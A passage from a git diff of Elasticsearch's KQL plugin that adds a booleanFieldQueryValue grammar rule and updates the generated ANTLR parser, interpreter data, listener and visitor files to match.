return rewriteDisjunctionQuery(boolQueryBuilder); + } } private static boolean isAndQuery(ParserRuleContext ctx) { @@ -269,9 +308,7 @@ private void withFields(KqlBaseParser.FieldNameContext ctx, BiConsumer { MappedFieldType fieldType = kqlParsingContext.fieldType(fieldName); diff --git a/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBase.interp b/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBase.interp index 7a1d446fd72c4..7528bbc64724f 100644 --- a/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBase.interp +++ b/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBase.interp @@ -53,8 +53,9 @@ existsQuery fieldQuery fieldLessQuery fieldQueryValue +booleanFieldQueryValue fieldName atn: -[4, 1, 16, 166, 2, 0, 7, 0, 2, 1, 7, 1, 2, 2, 7, 2, 2, 3, 7, 3, 2, 4, 7, 4, 2, 5, 7, 5, 2, 6, 7, 6, 2, 7, 7, 7, 2, 8, 7, 8, 2, 9, 7, 9, 2, 10, 7, 10, 2, 11, 7, 11, 2, 12, 7, 12, 2, 13, 7, 13, 2, 14, 7, 14, 2, 15, 7, 15, 2, 16, 7, 16, 1, 0, 3, 0, 36, 8, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 5, 1, 46, 8, 1, 10, 1, 12, 1, 49, 9, 1, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 3, 2, 59, 8, 2, 1, 3, 1, 3, 1, 3, 1, 4, 1, 4, 1, 4, 1, 4, 1, 4, 1, 4, 1, 5, 1, 5, 1, 5, 1, 5, 1, 5, 1, 5, 5, 5, 76, 8, 5, 10, 5, 12, 5, 79, 9, 5, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 3, 6, 88, 8, 6, 1, 7, 1, 7, 1, 7, 1, 7, 1, 8, 1, 8, 3, 8, 96, 8, 8, 1, 8, 1, 8, 1, 9, 1, 9, 1, 9, 1, 9, 1, 10, 1, 10, 1, 10, 1, 10, 1, 11, 4, 11, 109, 8, 11, 11, 11, 12, 11, 110, 1, 11, 3, 11, 114, 8, 11, 1, 12, 1, 12, 1, 12, 1, 12, 1, 13, 1, 13, 1, 13, 1, 13, 1, 13, 1, 13, 1, 13, 1, 13, 1, 13, 1, 13, 3, 13, 130, 8, 13, 1, 14, 1, 14, 1, 14, 1, 14, 1, 14, 3, 14, 137, 8, 14, 1, 15, 3, 15, 140, 8, 15, 1, 15, 4, 15, 143, 8, 15, 11, 15, 12, 15, 144, 1, 15, 3, 15, 148, 8, 15, 1, 15, 1, 15, 3, 15, 152, 8, 15, 1, 15, 1, 15, 3, 15, 156, 8, 15, 1, 15, 3, 15, 159, 8, 15, 1, 16, 1, 16, 1, 16, 3, 16, 164, 8, 16, 1, 16, 0, 2, 2, 10, 17, 0, 2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 0, 4, 1, 0, 2, 3, 1, 0, 6, 9, 2, 0, 14, 14, 16, 16, 1, 0, 2, 4, 179, 0, 35, 1, 0, 0, 0, 2, 39, 1, 0, 0, 0, 4, 58, 1, 0, 0, 0, 6, 60, 1, 0, 0, 0, 8, 63, 1, 0, 0, 0, 10, 69, 1, 0, 0, 0, 12, 87, 1, 0, 0, 0, 14, 89, 1, 0, 0, 0, 16, 95, 1, 0, 0, 0, 18, 99, 1, 0, 0, 0, 20, 103, 1, 0, 0, 0, 22, 113, 1, 0, 0, 0, 24, 115, 1, 0, 0, 0, 26, 129, 1, 0, 0, 0, 28, 136, 1, 0, 0, 0, 30, 158, 1, 0, 0, 0, 32, 163, 1, 0, 0, 0, 34, 36, 3, 2, 1, 0, 35, 34, 1, 0, 0, 0, 35, 36, 1, 0, 0, 0, 36, 37, 1, 0, 0, 0, 37, 38, 5, 0, 0, 1, 38, 1, 1, 0, 0, 0, 39, 40, 6, 1, -1, 0, 40, 41, 3, 4, 2, 0, 41, 47, 1, 0, 0, 0, 42, 43, 10, 2, 0, 0, 43, 44, 7, 0, 0, 0, 44, 46, 3, 2, 1, 2, 45, 42, 1, 0, 0, 0, 46, 49, 1, 0, 0, 0, 47, 45, 1, 0, 0, 0, 47, 48, 1, 0, 0, 0, 48, 3, 1, 0, 0, 0, 49, 47, 1, 0, 0, 0, 50, 59, 3, 6, 3, 0, 51, 59, 3, 8, 4, 0, 52, 59, 3, 18, 9, 0, 53, 59, 3, 16, 8, 0, 54, 59, 3, 24, 12, 0, 55, 59, 3, 20, 10, 0, 56, 59, 3, 26, 13, 0, 57, 59, 3, 28, 14, 0, 58, 50, 1, 0, 0, 0, 58, 51, 1, 0, 0, 0, 58, 52, 1, 0, 0, 0, 58, 53, 1, 0, 0, 0, 58, 54, 1, 0, 0, 0, 58, 55, 1, 0, 0, 0, 58, 56, 1, 0, 0, 0, 58, 57, 1, 0, 0, 0, 59, 5, 1, 0, 0, 0, 60, 61, 5, 4, 0, 0, 61, 62, 3, 4, 2, 0, 62, 7, 1, 0, 0, 0, 63, 64, 3, 32, 16, 0, 64, 65, 5, 5, 0, 0, 65, 66, 5, 12, 0, 0, 66, 67, 3, 10, 5, 0, 67, 68, 5, 13, 0, 0, 68, 9, 1, 0, 0, 0, 69, 70, 6, 5, -1, 0, 70, 71, 3, 12, 6, 0, 71, 77, 1, 0, 0, 0, 72, 73, 10, 2, 0, 0, 73, 74, 7, 0, 0, 0, 74, 76, 3, 10, 5, 2, 75, 72, 1, 0, 0, 0, 76, 79, 1, 0, 0, 0, 77, 75, 1, 0, 0, 0, 77, 78, 
1, 0, 0, 0, 78, 11, 1, 0, 0, 0, 79, 77, 1, 0, 0, 0, 80, 88, 3, 6, 3, 0, 81, 88, 3, 8, 4, 0, 82, 88, 3, 16, 8, 0, 83, 88, 3, 14, 7, 0, 84, 88, 3, 24, 12, 0, 85, 88, 3, 20, 10, 0, 86, 88, 3, 26, 13, 0, 87, 80, 1, 0, 0, 0, 87, 81, 1, 0, 0, 0, 87, 82, 1, 0, 0, 0, 87, 83, 1, 0, 0, 0, 87, 84, 1, 0, 0, 0, 87, 85, 1, 0, 0, 0, 87, 86, 1, 0, 0, 0, 88, 13, 1, 0, 0, 0, 89, 90, 5, 10, 0, 0, 90, 91, 3, 10, 5, 0, 91, 92, 5, 11, 0, 0, 92, 15, 1, 0, 0, 0, 93, 94, 5, 16, 0, 0, 94, 96, 5, 5, 0, 0, 95, 93, 1, 0, 0, 0, 95, 96, 1, 0, 0, 0, 96, 97, 1, 0, 0, 0, 97, 98, 5, 16, 0, 0, 98, 17, 1, 0, 0, 0, 99, 100, 5, 10, 0, 0, 100, 101, 3, 2, 1, 0, 101, 102, 5, 11, 0, 0, 102, 19, 1, 0, 0, 0, 103, 104, 3, 32, 16, 0, 104, 105, 7, 1, 0, 0, 105, 106, 3, 22, 11, 0, 106, 21, 1, 0, 0, 0, 107, 109, 7, 2, 0, 0, 108, 107, 1, 0, 0, 0, 109, 110, 1, 0, 0, 0, 110, 108, 1, 0, 0, 0, 110, 111, 1, 0, 0, 0, 111, 114, 1, 0, 0, 0, 112, 114, 5, 15, 0, 0, 113, 108, 1, 0, 0, 0, 113, 112, 1, 0, 0, 0, 114, 23, 1, 0, 0, 0, 115, 116, 3, 32, 16, 0, 116, 117, 5, 5, 0, 0, 117, 118, 5, 16, 0, 0, 118, 25, 1, 0, 0, 0, 119, 120, 3, 32, 16, 0, 120, 121, 5, 5, 0, 0, 121, 122, 3, 30, 15, 0, 122, 130, 1, 0, 0, 0, 123, 124, 3, 32, 16, 0, 124, 125, 5, 5, 0, 0, 125, 126, 5, 10, 0, 0, 126, 127, 3, 30, 15, 0, 127, 128, 5, 11, 0, 0, 128, 130, 1, 0, 0, 0, 129, 119, 1, 0, 0, 0, 129, 123, 1, 0, 0, 0, 130, 27, 1, 0, 0, 0, 131, 137, 3, 30, 15, 0, 132, 133, 5, 10, 0, 0, 133, 134, 3, 30, 15, 0, 134, 135, 5, 11, 0, 0, 135, 137, 1, 0, 0, 0, 136, 131, 1, 0, 0, 0, 136, 132, 1, 0, 0, 0, 137, 29, 1, 0, 0, 0, 138, 140, 7, 3, 0, 0, 139, 138, 1, 0, 0, 0, 139, 140, 1, 0, 0, 0, 140, 142, 1, 0, 0, 0, 141, 143, 7, 2, 0, 0, 142, 141, 1, 0, 0, 0, 143, 144, 1, 0, 0, 0, 144, 142, 1, 0, 0, 0, 144, 145, 1, 0, 0, 0, 145, 147, 1, 0, 0, 0, 146, 148, 7, 3, 0, 0, 147, 146, 1, 0, 0, 0, 147, 148, 1, 0, 0, 0, 148, 159, 1, 0, 0, 0, 149, 151, 7, 0, 0, 0, 150, 152, 7, 3, 0, 0, 151, 150, 1, 0, 0, 0, 151, 152, 1, 0, 0, 0, 152, 159, 1, 0, 0, 0, 153, 155, 5, 4, 0, 0, 154, 156, 7, 0, 0, 0, 155, 154, 1, 0, 0, 0, 155, 156, 1, 0, 0, 0, 156, 159, 1, 0, 0, 0, 157, 159, 5, 15, 0, 0, 158, 139, 1, 0, 0, 0, 158, 149, 1, 0, 0, 0, 158, 153, 1, 0, 0, 0, 158, 157, 1, 0, 0, 0, 159, 31, 1, 0, 0, 0, 160, 164, 5, 14, 0, 0, 161, 164, 5, 15, 0, 0, 162, 164, 5, 16, 0, 0, 163, 160, 1, 0, 0, 0, 163, 161, 1, 0, 0, 0, 163, 162, 1, 0, 0, 0, 164, 33, 1, 0, 0, 0, 17, 35, 47, 58, 77, 87, 95, 110, 113, 129, 136, 139, 144, 147, 151, 155, 158, 163] +[4, 1, 16, 181, 2, 0, 7, 0, 2, 1, 7, 1, 2, 2, 7, 2, 2, 3, 7, 3, 2, 4, 7, 4, 2, 5, 7, 5, 2, 6, 7, 6, 2, 7, 7, 7, 2, 8, 7, 8, 2, 9, 7, 9, 2, 10, 7, 10, 2, 11, 7, 11, 2, 12, 7, 12, 2, 13, 7, 13, 2, 14, 7, 14, 2, 15, 7, 15, 2, 16, 7, 16, 2, 17, 7, 17, 1, 0, 3, 0, 38, 8, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 5, 1, 48, 8, 1, 10, 1, 12, 1, 51, 9, 1, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 3, 2, 61, 8, 2, 1, 3, 1, 3, 1, 3, 1, 4, 1, 4, 1, 4, 1, 4, 1, 4, 1, 4, 1, 5, 1, 5, 1, 5, 1, 5, 1, 5, 1, 5, 5, 5, 78, 8, 5, 10, 5, 12, 5, 81, 9, 5, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 3, 6, 90, 8, 6, 1, 7, 1, 7, 1, 7, 1, 7, 1, 8, 1, 8, 3, 8, 98, 8, 8, 1, 8, 1, 8, 1, 9, 1, 9, 1, 9, 1, 9, 1, 10, 1, 10, 1, 10, 1, 10, 1, 11, 4, 11, 111, 8, 11, 11, 11, 12, 11, 112, 1, 11, 3, 11, 116, 8, 11, 1, 12, 1, 12, 1, 12, 1, 12, 1, 13, 1, 13, 1, 13, 1, 13, 1, 14, 1, 14, 1, 15, 4, 15, 129, 8, 15, 11, 15, 12, 15, 130, 1, 15, 3, 15, 134, 8, 15, 1, 15, 4, 15, 137, 8, 15, 11, 15, 12, 15, 138, 1, 15, 4, 15, 142, 8, 15, 11, 15, 12, 15, 143, 1, 15, 3, 15, 147, 8, 15, 1, 15, 1, 15, 1, 15, 3, 15, 152, 8, 15, 1, 
15, 1, 15, 1, 15, 1, 15, 3, 15, 158, 8, 15, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 3, 16, 166, 8, 16, 1, 16, 1, 16, 1, 16, 5, 16, 171, 8, 16, 10, 16, 12, 16, 174, 9, 16, 1, 17, 1, 17, 1, 17, 3, 17, 179, 8, 17, 1, 17, 0, 3, 2, 10, 32, 18, 0, 2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 34, 0, 4, 1, 0, 2, 3, 1, 0, 6, 9, 2, 0, 14, 14, 16, 16, 1, 0, 2, 4, 196, 0, 37, 1, 0, 0, 0, 2, 41, 1, 0, 0, 0, 4, 60, 1, 0, 0, 0, 6, 62, 1, 0, 0, 0, 8, 65, 1, 0, 0, 0, 10, 71, 1, 0, 0, 0, 12, 89, 1, 0, 0, 0, 14, 91, 1, 0, 0, 0, 16, 97, 1, 0, 0, 0, 18, 101, 1, 0, 0, 0, 20, 105, 1, 0, 0, 0, 22, 115, 1, 0, 0, 0, 24, 117, 1, 0, 0, 0, 26, 121, 1, 0, 0, 0, 28, 125, 1, 0, 0, 0, 30, 157, 1, 0, 0, 0, 32, 165, 1, 0, 0, 0, 34, 178, 1, 0, 0, 0, 36, 38, 3, 2, 1, 0, 37, 36, 1, 0, 0, 0, 37, 38, 1, 0, 0, 0, 38, 39, 1, 0, 0, 0, 39, 40, 5, 0, 0, 1, 40, 1, 1, 0, 0, 0, 41, 42, 6, 1, -1, 0, 42, 43, 3, 4, 2, 0, 43, 49, 1, 0, 0, 0, 44, 45, 10, 2, 0, 0, 45, 46, 7, 0, 0, 0, 46, 48, 3, 2, 1, 2, 47, 44, 1, 0, 0, 0, 48, 51, 1, 0, 0, 0, 49, 47, 1, 0, 0, 0, 49, 50, 1, 0, 0, 0, 50, 3, 1, 0, 0, 0, 51, 49, 1, 0, 0, 0, 52, 61, 3, 6, 3, 0, 53, 61, 3, 8, 4, 0, 54, 61, 3, 18, 9, 0, 55, 61, 3, 16, 8, 0, 56, 61, 3, 24, 12, 0, 57, 61, 3, 20, 10, 0, 58, 61, 3, 26, 13, 0, 59, 61, 3, 28, 14, 0, 60, 52, 1, 0, 0, 0, 60, 53, 1, 0, 0, 0, 60, 54, 1, 0, 0, 0, 60, 55, 1, 0, 0, 0, 60, 56, 1, 0, 0, 0, 60, 57, 1, 0, 0, 0, 60, 58, 1, 0, 0, 0, 60, 59, 1, 0, 0, 0, 61, 5, 1, 0, 0, 0, 62, 63, 5, 4, 0, 0, 63, 64, 3, 4, 2, 0, 64, 7, 1, 0, 0, 0, 65, 66, 3, 34, 17, 0, 66, 67, 5, 5, 0, 0, 67, 68, 5, 12, 0, 0, 68, 69, 3, 10, 5, 0, 69, 70, 5, 13, 0, 0, 70, 9, 1, 0, 0, 0, 71, 72, 6, 5, -1, 0, 72, 73, 3, 12, 6, 0, 73, 79, 1, 0, 0, 0, 74, 75, 10, 2, 0, 0, 75, 76, 7, 0, 0, 0, 76, 78, 3, 10, 5, 2, 77, 74, 1, 0, 0, 0, 78, 81, 1, 0, 0, 0, 79, 77, 1, 0, 0, 0, 79, 80, 1, 0, 0, 0, 80, 11, 1, 0, 0, 0, 81, 79, 1, 0, 0, 0, 82, 90, 3, 6, 3, 0, 83, 90, 3, 8, 4, 0, 84, 90, 3, 16, 8, 0, 85, 90, 3, 14, 7, 0, 86, 90, 3, 24, 12, 0, 87, 90, 3, 20, 10, 0, 88, 90, 3, 26, 13, 0, 89, 82, 1, 0, 0, 0, 89, 83, 1, 0, 0, 0, 89, 84, 1, 0, 0, 0, 89, 85, 1, 0, 0, 0, 89, 86, 1, 0, 0, 0, 89, 87, 1, 0, 0, 0, 89, 88, 1, 0, 0, 0, 90, 13, 1, 0, 0, 0, 91, 92, 5, 10, 0, 0, 92, 93, 3, 10, 5, 0, 93, 94, 5, 11, 0, 0, 94, 15, 1, 0, 0, 0, 95, 96, 5, 16, 0, 0, 96, 98, 5, 5, 0, 0, 97, 95, 1, 0, 0, 0, 97, 98, 1, 0, 0, 0, 98, 99, 1, 0, 0, 0, 99, 100, 5, 16, 0, 0, 100, 17, 1, 0, 0, 0, 101, 102, 5, 10, 0, 0, 102, 103, 3, 2, 1, 0, 103, 104, 5, 11, 0, 0, 104, 19, 1, 0, 0, 0, 105, 106, 3, 34, 17, 0, 106, 107, 7, 1, 0, 0, 107, 108, 3, 22, 11, 0, 108, 21, 1, 0, 0, 0, 109, 111, 7, 2, 0, 0, 110, 109, 1, 0, 0, 0, 111, 112, 1, 0, 0, 0, 112, 110, 1, 0, 0, 0, 112, 113, 1, 0, 0, 0, 113, 116, 1, 0, 0, 0, 114, 116, 5, 15, 0, 0, 115, 110, 1, 0, 0, 0, 115, 114, 1, 0, 0, 0, 116, 23, 1, 0, 0, 0, 117, 118, 3, 34, 17, 0, 118, 119, 5, 5, 0, 0, 119, 120, 5, 16, 0, 0, 120, 25, 1, 0, 0, 0, 121, 122, 3, 34, 17, 0, 122, 123, 5, 5, 0, 0, 123, 124, 3, 30, 15, 0, 124, 27, 1, 0, 0, 0, 125, 126, 3, 30, 15, 0, 126, 29, 1, 0, 0, 0, 127, 129, 7, 2, 0, 0, 128, 127, 1, 0, 0, 0, 129, 130, 1, 0, 0, 0, 130, 128, 1, 0, 0, 0, 130, 131, 1, 0, 0, 0, 131, 158, 1, 0, 0, 0, 132, 134, 7, 2, 0, 0, 133, 132, 1, 0, 0, 0, 133, 134, 1, 0, 0, 0, 134, 136, 1, 0, 0, 0, 135, 137, 7, 3, 0, 0, 136, 135, 1, 0, 0, 0, 137, 138, 1, 0, 0, 0, 138, 136, 1, 0, 0, 0, 138, 139, 1, 0, 0, 0, 139, 158, 1, 0, 0, 0, 140, 142, 7, 0, 0, 0, 141, 140, 1, 0, 0, 0, 142, 143, 1, 0, 0, 0, 143, 141, 1, 0, 0, 0, 143, 144, 1, 0, 0, 0, 144, 146, 1, 0, 0, 0, 145, 147, 7, 2, 0, 0, 146, 145, 
1, 0, 0, 0, 146, 147, 1, 0, 0, 0, 147, 158, 1, 0, 0, 0, 148, 158, 5, 15, 0, 0, 149, 151, 5, 4, 0, 0, 150, 152, 3, 30, 15, 0, 151, 150, 1, 0, 0, 0, 151, 152, 1, 0, 0, 0, 152, 158, 1, 0, 0, 0, 153, 154, 5, 10, 0, 0, 154, 155, 3, 32, 16, 0, 155, 156, 5, 11, 0, 0, 156, 158, 1, 0, 0, 0, 157, 128, 1, 0, 0, 0, 157, 133, 1, 0, 0, 0, 157, 141, 1, 0, 0, 0, 157, 148, 1, 0, 0, 0, 157, 149, 1, 0, 0, 0, 157, 153, 1, 0, 0, 0, 158, 31, 1, 0, 0, 0, 159, 160, 6, 16, -1, 0, 160, 161, 5, 10, 0, 0, 161, 162, 3, 32, 16, 0, 162, 163, 5, 11, 0, 0, 163, 166, 1, 0, 0, 0, 164, 166, 3, 30, 15, 0, 165, 159, 1, 0, 0, 0, 165, 164, 1, 0, 0, 0, 166, 172, 1, 0, 0, 0, 167, 168, 10, 3, 0, 0, 168, 169, 7, 0, 0, 0, 169, 171, 3, 30, 15, 0, 170, 167, 1, 0, 0, 0, 171, 174, 1, 0, 0, 0, 172, 170, 1, 0, 0, 0, 172, 173, 1, 0, 0, 0, 173, 33, 1, 0, 0, 0, 174, 172, 1, 0, 0, 0, 175, 179, 5, 14, 0, 0, 176, 179, 5, 15, 0, 0, 177, 179, 5, 16, 0, 0, 178, 175, 1, 0, 0, 0, 178, 176, 1, 0, 0, 0, 178, 177, 1, 0, 0, 0, 179, 35, 1, 0, 0, 0, 18, 37, 49, 60, 79, 89, 97, 112, 115, 130, 133, 138, 143, 146, 151, 157, 165, 172, 178] \ No newline at end of file diff --git a/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBaseBaseListener.java b/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBaseBaseListener.java index c3fc1281b6fd9..f29a1ba763457 100644 --- a/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBaseBaseListener.java +++ b/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBaseBaseListener.java @@ -236,6 +236,18 @@ class KqlBaseBaseListener implements KqlBaseListener { *

<p>The default implementation does nothing.</p>
*/ @Override public void exitFieldQueryValue(KqlBaseParser.FieldQueryValueContext ctx) { } + /** + * {@inheritDoc} + * + *

<p>The default implementation does nothing.</p>
+ */ + @Override public void enterBooleanFieldQueryValue(KqlBaseParser.BooleanFieldQueryValueContext ctx) { } + /** + * {@inheritDoc} + * + *

<p>The default implementation does nothing.</p>
+ */ + @Override public void exitBooleanFieldQueryValue(KqlBaseParser.BooleanFieldQueryValueContext ctx) { } /** * {@inheritDoc} * diff --git a/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBaseBaseVisitor.java b/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBaseBaseVisitor.java index 84c882c2e2bcf..0ea328f02a8e8 100644 --- a/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBaseBaseVisitor.java +++ b/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBaseBaseVisitor.java @@ -146,6 +146,13 @@ class KqlBaseBaseVisitor extends AbstractParseTreeVisitor implements KqlBa * {@link #visitChildren} on {@code ctx}.
</p>
*/ @Override public T visitFieldQueryValue(KqlBaseParser.FieldQueryValueContext ctx) { return visitChildren(ctx); } + /** + * {@inheritDoc} + * + *

<p>The default implementation returns the result of calling + * {@link #visitChildren} on {@code ctx}.</p>
+ */ + @Override public T visitBooleanFieldQueryValue(KqlBaseParser.BooleanFieldQueryValueContext ctx) { return visitChildren(ctx); } /** * {@inheritDoc} * diff --git a/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBaseListener.java b/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBaseListener.java index a44ecf1ecad23..6966553036d88 100644 --- a/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBaseListener.java +++ b/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBaseListener.java @@ -203,6 +203,16 @@ interface KqlBaseListener extends ParseTreeListener { * @param ctx the parse tree */ void exitFieldQueryValue(KqlBaseParser.FieldQueryValueContext ctx); + /** + * Enter a parse tree produced by {@link KqlBaseParser#booleanFieldQueryValue}. + * @param ctx the parse tree + */ + void enterBooleanFieldQueryValue(KqlBaseParser.BooleanFieldQueryValueContext ctx); + /** + * Exit a parse tree produced by {@link KqlBaseParser#booleanFieldQueryValue}. + * @param ctx the parse tree + */ + void exitBooleanFieldQueryValue(KqlBaseParser.BooleanFieldQueryValueContext ctx); /** * Enter a parse tree produced by {@link KqlBaseParser#fieldName}. * @param ctx the parse tree diff --git a/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBaseParser.java b/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBaseParser.java index abc50ac82542b..5c1eb04f57e9a 100644 --- a/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBaseParser.java +++ b/x-pack/plugin/kql/src/main/java/org/elasticsearch/xpack/kql/parser/KqlBaseParser.java @@ -25,37 +25,38 @@ class KqlBaseParser extends Parser { protected static final PredictionContextCache _sharedContextCache = new PredictionContextCache(); public static final int - DEFAULT_SKIP=1, AND=2, OR=3, NOT=4, COLON=5, OP_LESS=6, OP_LESS_EQ=7, - OP_MORE=8, OP_MORE_EQ=9, LEFT_PARENTHESIS=10, RIGHT_PARENTHESIS=11, LEFT_CURLY_BRACKET=12, + DEFAULT_SKIP=1, AND=2, OR=3, NOT=4, COLON=5, OP_LESS=6, OP_LESS_EQ=7, + OP_MORE=8, OP_MORE_EQ=9, LEFT_PARENTHESIS=10, RIGHT_PARENTHESIS=11, LEFT_CURLY_BRACKET=12, RIGHT_CURLY_BRACKET=13, UNQUOTED_LITERAL=14, QUOTED_STRING=15, WILDCARD=16; public static final int - RULE_topLevelQuery = 0, RULE_query = 1, RULE_simpleQuery = 2, RULE_notQuery = 3, - RULE_nestedQuery = 4, RULE_nestedSubQuery = 5, RULE_nestedSimpleSubQuery = 6, - RULE_nestedParenthesizedQuery = 7, RULE_matchAllQuery = 8, RULE_parenthesizedQuery = 9, - RULE_rangeQuery = 10, RULE_rangeQueryValue = 11, RULE_existsQuery = 12, - RULE_fieldQuery = 13, RULE_fieldLessQuery = 14, RULE_fieldQueryValue = 15, - RULE_fieldName = 16; + RULE_topLevelQuery = 0, RULE_query = 1, RULE_simpleQuery = 2, RULE_notQuery = 3, + RULE_nestedQuery = 4, RULE_nestedSubQuery = 5, RULE_nestedSimpleSubQuery = 6, + RULE_nestedParenthesizedQuery = 7, RULE_matchAllQuery = 8, RULE_parenthesizedQuery = 9, + RULE_rangeQuery = 10, RULE_rangeQueryValue = 11, RULE_existsQuery = 12, + RULE_fieldQuery = 13, RULE_fieldLessQuery = 14, RULE_fieldQueryValue = 15, + RULE_booleanFieldQueryValue = 16, RULE_fieldName = 17; private static String[] makeRuleNames() { return new String[] { - "topLevelQuery", "query", "simpleQuery", "notQuery", "nestedQuery", "nestedSubQuery", - "nestedSimpleSubQuery", "nestedParenthesizedQuery", "matchAllQuery", - "parenthesizedQuery", "rangeQuery", "rangeQueryValue", "existsQuery", - "fieldQuery", "fieldLessQuery", "fieldQueryValue", "fieldName" + "topLevelQuery", 
"query", "simpleQuery", "notQuery", "nestedQuery", "nestedSubQuery", + "nestedSimpleSubQuery", "nestedParenthesizedQuery", "matchAllQuery", + "parenthesizedQuery", "rangeQuery", "rangeQueryValue", "existsQuery", + "fieldQuery", "fieldLessQuery", "fieldQueryValue", "booleanFieldQueryValue", + "fieldName" }; } public static final String[] ruleNames = makeRuleNames(); private static String[] makeLiteralNames() { return new String[] { - null, null, "'and'", "'or'", "'not'", "':'", "'<'", "'<='", "'>'", "'>='", + null, null, "'and'", "'or'", "'not'", "':'", "'<'", "'<='", "'>'", "'>='", "'('", "')'", "'{'", "'}'" }; } private static final String[] _LITERAL_NAMES = makeLiteralNames(); private static String[] makeSymbolicNames() { return new String[] { - null, "DEFAULT_SKIP", "AND", "OR", "NOT", "COLON", "OP_LESS", "OP_LESS_EQ", - "OP_MORE", "OP_MORE_EQ", "LEFT_PARENTHESIS", "RIGHT_PARENTHESIS", "LEFT_CURLY_BRACKET", + null, "DEFAULT_SKIP", "AND", "OR", "NOT", "COLON", "OP_LESS", "OP_LESS_EQ", + "OP_MORE", "OP_MORE_EQ", "LEFT_PARENTHESIS", "RIGHT_PARENTHESIS", "LEFT_CURLY_BRACKET", "RIGHT_CURLY_BRACKET", "UNQUOTED_LITERAL", "QUOTED_STRING", "WILDCARD" }; } @@ -142,17 +143,17 @@ public final TopLevelQueryContext topLevelQuery() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(35); + setState(37); _errHandler.sync(this); _la = _input.LA(1); if ((((_la) & ~0x3f) == 0 && ((1L << _la) & 115740L) != 0)) { { - setState(34); + setState(36); query(0); } } - setState(37); + setState(39); match(EOF); } } @@ -173,7 +174,7 @@ public QueryContext(ParserRuleContext parent, int invokingState) { super(parent, invokingState); } @Override public int getRuleIndex() { return RULE_query; } - + public QueryContext() { } public void copyFrom(QueryContext ctx) { super.copyFrom(ctx); @@ -247,11 +248,11 @@ private QueryContext query(int _p) throws RecognitionException { _ctx = _localctx; _prevctx = _localctx; - setState(40); + setState(42); simpleQuery(); } _ctx.stop = _input.LT(-1); - setState(47); + setState(49); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,1,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { @@ -262,9 +263,9 @@ private QueryContext query(int _p) throws RecognitionException { { _localctx = new BooleanQueryContext(new QueryContext(_parentctx, _parentState)); pushNewRecursionContext(_localctx, _startState, RULE_query); - setState(42); + setState(44); if (!(precpred(_ctx, 2))) throw new FailedPredicateException(this, "precpred(_ctx, 2)"); - setState(43); + setState(45); ((BooleanQueryContext)_localctx).operator = _input.LT(1); _la = _input.LA(1); if ( !(_la==AND || _la==OR) ) { @@ -275,12 +276,12 @@ private QueryContext query(int _p) throws RecognitionException { _errHandler.reportMatch(this); consume(); } - setState(44); + setState(46); query(2); } - } + } } - setState(49); + setState(51); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,1,_ctx); } @@ -346,62 +347,62 @@ public final SimpleQueryContext simpleQuery() throws RecognitionException { SimpleQueryContext _localctx = new SimpleQueryContext(_ctx, getState()); enterRule(_localctx, 4, RULE_simpleQuery); try { - setState(58); + setState(60); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,2,_ctx) ) { case 1: enterOuterAlt(_localctx, 1); { - setState(50); + setState(52); notQuery(); } break; case 2: enterOuterAlt(_localctx, 2); { - setState(51); + setState(53); nestedQuery(); } break; case 3: enterOuterAlt(_localctx, 3); 
{ - setState(52); + setState(54); parenthesizedQuery(); } break; case 4: enterOuterAlt(_localctx, 4); { - setState(53); + setState(55); matchAllQuery(); } break; case 5: enterOuterAlt(_localctx, 5); { - setState(54); + setState(56); existsQuery(); } break; case 6: enterOuterAlt(_localctx, 6); { - setState(55); + setState(57); rangeQuery(); } break; case 7: enterOuterAlt(_localctx, 7); { - setState(56); + setState(58); fieldQuery(); } break; case 8: enterOuterAlt(_localctx, 8); { - setState(57); + setState(59); fieldLessQuery(); } break; @@ -450,9 +451,9 @@ public final NotQueryContext notQuery() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(60); + setState(62); match(NOT); - setState(61); + setState(63); ((NotQueryContext)_localctx).subQuery = simpleQuery(); } } @@ -503,15 +504,15 @@ public final NestedQueryContext nestedQuery() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(63); + setState(65); 